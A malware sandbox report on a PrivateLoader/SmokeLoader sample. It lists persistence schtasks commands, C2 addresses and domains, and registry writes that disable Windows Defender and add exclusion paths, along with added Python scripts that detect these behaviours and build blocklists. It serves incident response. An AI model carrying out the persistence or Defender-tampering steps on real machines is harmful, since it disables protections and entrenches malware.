Malware Analysis Report

2024-11-15 09:02

Sample ID 241111-jzcw5swgjd
Target 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5
SHA256 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5
Tags
loader vmprotect privateloader discovery gcleaner defense_evasion evasion execution spyware stealer trojan persistence smokeloader backdoor
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral4, behavioral10, behavioral11, behavioral5, behavioral6, behavioral9, behavioral1, behavioral3, behavioral8, behavioral13, behavioral14, behavioral2, behavioral7, behavioral12 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5

Threat Level: Known bad

The file 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5 was found to be: Known bad.

Malicious Activity Summary

loader vmprotect privateloader discovery gcleaner defense_evasion evasion execution spyware stealer trojan persistence smokeloader backdoor

Windows security bypass

Smokeloader family

Gcleaner family

Modifies Windows Defender Real-time Protection settings

GCleaner

SmokeLoader

Privateloader family

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Indirect Command Execution

Checks computer location settings

VMProtect packed file

Adds Run key to start application

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Enumerates processes with tasklist

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 08:06

Signatures

Privateloader family

privateloader

VMProtect packed file

vmprotect
Description / Indicator / Process / Target: none recorded (1 entry)

Unsigned PE

Description / Indicator / Process / Target: none recorded (8 entries)

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
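The two schtasks lines above register the same binary twice, hourly and at every logon, both with /rl HIGHEST, so the task runs with the account's full administrative token at each trigger and removing one task leaves the other. The Python below is an added example, not part of the sandbox output: it parses schtasks /create command lines and scores them for persistence signals. The sample lines are the two from this table; the switch parser, the trigger list and the scoring heuristics are my own.

```python
"""Triage `schtasks /create` command lines for persistence indicators.

Added example for this report, not tooling from the sandbox vendor. The two
sample command lines are copied from the Processes table; the option parsing
and the scoring heuristics are my own.
"""
import re

# Copied from the report (behavioral4 Processes table).
SAMPLE_CMDLINES = [
    r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST',
    r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST',
]

# Triggers that fire often or at every logon: typical for loader persistence.
TRIGGERS_OF_INTEREST = {"MINUTE", "HOURLY", "ONLOGON", "ONSTART", "ONIDLE"}
# Directory fragments a service-like binary should not live in (heuristic).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def tokenize_windows_cmdline(cmdline: str) -> list[str]:
    """Split a command line the way schtasks sees it: double-quoted runs stay
    together and the surrounding quotes are dropped."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline: str) -> dict:
    """Return the switches of a schtasks command line as {SWITCH: value|True}.

    A switch consumes the following token as its value unless that token is
    itself a switch, so flag-only switches such as /create and /f map to True.
    Switch names are upper-cased because schtasks accepts any case.
    """
    tokens = tokenize_windows_cmdline(cmdline)
    opts: dict = {}
    i = 1  # tokens[0] is the program name (schtasks or a full path to it)
    while i < len(tokens):
        if tokens[i].startswith("/"):
            name = tokens[i][1:].upper()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[name] = tokens[i + 1]
                i += 2
                continue
            opts[name] = True
        i += 1
    return opts


def assess_schtasks(cmdline: str) -> dict:
    """Score one command line; each reason is an independent persistence signal."""
    opts = parse_schtasks(cmdline)
    result = {"task": opts.get("TN"), "action": opts.get("TR"), "reasons": []}
    if "CREATE" not in opts:
        return result  # only task creation is interesting here
    reasons = result["reasons"]
    if str(opts.get("RL", "")).upper() == "HIGHEST":
        reasons.append("runs elevated (/rl HIGHEST)")
    sc = str(opts.get("SC", "")).upper()
    if sc in TRIGGERS_OF_INTEREST:
        reasons.append(f"high-frequency or logon trigger (/sc {sc})")
    if opts.get("F") is True:
        reasons.append("silently overwrites an existing task (/f)")
    if "RU" in opts:
        reasons.append(f"explicit run-as account (/ru {opts['RU']})")
    action = str(opts.get("TR", "")).lower()
    if any(frag in action for frag in USER_WRITABLE):
        reasons.append("action lives in a user-writable directory")
    return result


def find_shared_actions(cmdlines) -> dict:
    """Group task names by the executable they launch: one binary registered
    under several task names is redundant persistence."""
    by_action: dict = {}
    for cmd in cmdlines:
        opts = parse_schtasks(cmd)
        if "CREATE" in opts and "TR" in opts and "TN" in opts:
            by_action.setdefault(str(opts["TR"]).lower(), []).append(opts["TN"])
    return {action: names for action, names in by_action.items() if len(names) > 1}


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        r = assess_schtasks(cmd)
        print(f"{r['task']!r}: {len(r['reasons'])} signals -> {r['reasons']}")
    print("shared actions:", find_shared_actions(SAMPLE_CMDLINES))
```

On a live host the two tasks are visible with schtasks /query /v /fo LIST /tn "PowerControl HR" (and "PowerControl LG"); both must be deleted together with the PowerControl_Svc.exe binary they point at, otherwise the surviving task restores execution at the next trigger.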

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.77:443 yandex.ru tcp
US 8.8.8.8:53 dzen.ru udp
RU 62.217.160.2:443 dzen.ru tcp
US 8.8.8.8:53 sso.passport.yandex.ru udp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp
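Most rows in this table are DNS lookups through the sandbox resolver (8.8.8.8:53) and sessions to popular services; the rows that matter for blocking are the port-80 sessions to bare IP addresses that were never resolved by name, plus the three domains that are not well-known services. The Python below is an added example, not sandbox tooling: it parses rows in exactly this table's format (a subset copied from the behavioral4 and behavioral10 tables, including a behavioral10 row with no domain column) and sorts them into buckets a responder would treat differently. The list of popular services used to suppress noise is my assumption.

```python
"""Triage the sandbox's Network table into blocklist-grade indicators.

Added example, not part of the sandbox report. The rows below are copied
from the report (behavioral4 and behavioral10 Network tables); the list of
popular services used for noise suppression is my own assumption.
"""
import ipaddress
from collections import defaultdict

# Copied rows: "<country> <ip:port> [<domain>] <proto>"; the behavioral10
# row at the end has no domain column at all.
NETWORK_ROWS = """\
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 sso.passport.yandex.ru udp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 208.67.104.97:80 tcp
"""

# Assumption: well-known services the loader contacts for connectivity checks
# or dead-drop content (the report itself flags pastebin.com as abused
# legitimate hosting). Not worth a network block on their own.
POPULAR_SERVICES = {"telegram.org", "twitter.com", "yandex.ru", "dzen.ru", "pastebin.com"}


def parse_rows(text: str):
    """Yield (ip, port, domain_or_None, proto) per table row."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) not in (3, 4):
            continue
        ip, port = fields[1].rsplit(":", 1)
        domain = fields[2] if len(fields) == 4 else None
        yield ip, int(port), domain, fields[-1]


def is_ip_literal(name: str) -> bool:
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def is_popular(domain: str) -> bool:
    d = domain.lower()
    return any(d == s or d.endswith("." + s) for s in POPULAR_SERVICES)


def triage(text: str) -> dict:
    """Split indicators into buckets: raw-IP sessions (no name lookup at all),
    attacker-controlled names, popular services, and reverse-lookup noise."""
    out = {"raw_ip_connections": set(), "attacker_domains": set(),
           "popular_services": set(), "reverse_lookups": 0,
           "resolved": defaultdict(set)}
    for ip, port, domain, proto in parse_rows(text):
        # A resolver row carries the queried name, not a connection of interest.
        if port == 53 and proto == "udp" and domain:
            if domain.endswith(".in-addr.arpa"):
                out["reverse_lookups"] += 1
            elif is_popular(domain):
                out["popular_services"].add(domain)
            else:
                out["attacker_domains"].add(domain)
            continue
        if domain is None or is_ip_literal(domain):
            out["raw_ip_connections"].add(ip)  # hard-coded endpoint, no DNS
        elif is_popular(domain):
            out["popular_services"].add(domain)
            out["resolved"][domain].add(ip)
        else:
            out["attacker_domains"].add(domain)
            out["resolved"][domain].add(ip)
    out["resolved"] = dict(out["resolved"])
    return out


def blocklist(result: dict) -> list[str]:
    """Names first, then the raw IPs. IPs that attacker names resolved to are
    left out on purpose: they may sit in shared CDN ranges."""
    return ([f"domain:{d}" for d in sorted(result["attacker_domains"])]
            + [f"ip:{i}" for i in sorted(result["raw_ip_connections"])])


if __name__ == "__main__":
    res = triage(NETWORK_ROWS)
    for bucket in ("raw_ip_connections", "attacker_domains", "popular_services"):
        print(bucket, sorted(res[bucket]))
    print("\n".join(blocklist(res)))
```

The IP behind wfsdragon.ru (104.21.5.208) falls inside Cloudflare's 104.16.0.0/13 range, as does the pastebin.com address; block the names, not those addresses. softs-portal.com and vipsofts.xyz appear only as lookups here; the table does not tie them to the 163.123.143.12 sessions that follow, so treat that as a hypothesis to confirm with a packet capture rather than a fact.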

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 972

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 884

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

memory/4348-1-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/4348-2-0x0000000000470000-0x00000000004AF000-memory.dmp

memory/4348-3-0x0000000000400000-0x0000000000443000-memory.dmp

memory/4348-4-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/4348-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4348-6-0x0000000000470000-0x00000000004AF000-memory.dmp

memory/4348-7-0x0000000000400000-0x0000000000443000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
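The two signatures above show the 32-bit reg.exe under SysWOW64 writing the Defender policy switch DisableRealtimeMonitoring = 1 and adding every drop directory to Exclusions\Paths, in both the native SOFTWARE view and the Wow6432Node view. The Python below is an added example, not sandbox tooling: it parses event lines in the format of these tables (a handful copied from above, plus one harmless reg.exe read of NLS\Language to show it is ignored) and reduces them to a deduplicated list of tampering findings and the set of excluded directories. The rule set is mine.

```python
"""Flag Windows Defender tampering in registry-write telemetry.

Added example, not part of the sandbox report. The event lines are copied
from the report's behavioral11 signature tables, with one benign line
(the NLS\\Language read) included to show it is ignored. The line-format
parser and the rule set are my own.
"""
import re

EVENT_LINES = r"""
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
"""

# "<op> <registry path>[ = "<value>"] <process> N/A"; the path may contain
# spaces, so it is matched lazily and the process is the last token before N/A.
LINE_RE = re.compile(
    r"^(?P<op>Key created|Key opened|Key value queried|Set value \((?P<vtype>\w+)\))\s+"
    r"(?P<path>\\REGISTRY\\.+?)"
    r'(?:\s=\s"(?P<value>[^"]*)")?'
    r"\s+(?P<proc>\S+)\s+N/A$"
)

# (pattern over the lower-cased path, description, only-when-value-nonzero).
# Matching on the substring after "windows defender" covers the Policies key,
# the native SOFTWARE key and the Wow6432Node view alike.
TAMPER_RULES = [
    (re.compile(r"\\windows defender\\real-time protection\\disablerealtimemonitoring$"),
     "real-time protection disabled through policy key", True),
    (re.compile(r"\\windows defender\\disableantispyware$"),
     "Defender disabled through policy key", True),
    (re.compile(r"\\windows defender\\exclusions\\(paths|processes|extensions)\\(?P<item>.+)$"),
     "Defender exclusion added", False),
]


def parse_event(line: str):
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_defender_tampering(lines) -> dict:
    findings, seen, excluded = [], set(), set()
    for line in lines:
        ev = parse_event(line)
        if not ev or not ev["op"].startswith("Set value"):
            continue  # key creation and reads are not tampering by themselves
        norm = ev["path"].lower()
        for rule, why, nonzero_only in TAMPER_RULES:
            m = rule.search(norm)
            if not m or (nonzero_only and ev["value"] == "0"):
                continue  # a 0 written to a Disable* value re-enables the feature
            if (why, norm) in seen:
                continue  # the sandbox logs repeated identical writes
            seen.add((why, norm))
            # Slice the original path so the excluded directory keeps its case
            # (lower() preserves length for the ASCII paths seen here).
            item = ev["path"][m.start("item"):m.end("item")] if "item" in m.groupdict() else None
            if item:
                excluded.add(item)
            findings.append({"reason": why, "path": ev["path"], "value": ev["value"],
                             "process": ev["proc"], "item": item,
                             "view": "Wow6432Node" if "\\wow6432node\\" in norm else "native"})
    return {"findings": findings, "excluded_paths": excluded}


if __name__ == "__main__":
    result = detect_defender_tampering(EVENT_LINES.splitlines())
    for f in result["findings"]:
        print(f"[{f['view']}] {f['reason']}: {f['item'] or f['path']} = {f['value']}")
    print("directories to inspect:", sorted(result["excluded_paths"]))
```

The excluded_paths set is the remediation list: each entry is a directory the sample intended to hide its drops in, so collect and inspect those before deleting anything. On the Windows 7 image used here nothing guards these keys; on Windows 10/11 with Tamper Protection enabled, turning real-time protection off this way is rejected, but whether exclusion writes are also protected depends on the device's management configuration, so do not assume they failed.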

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
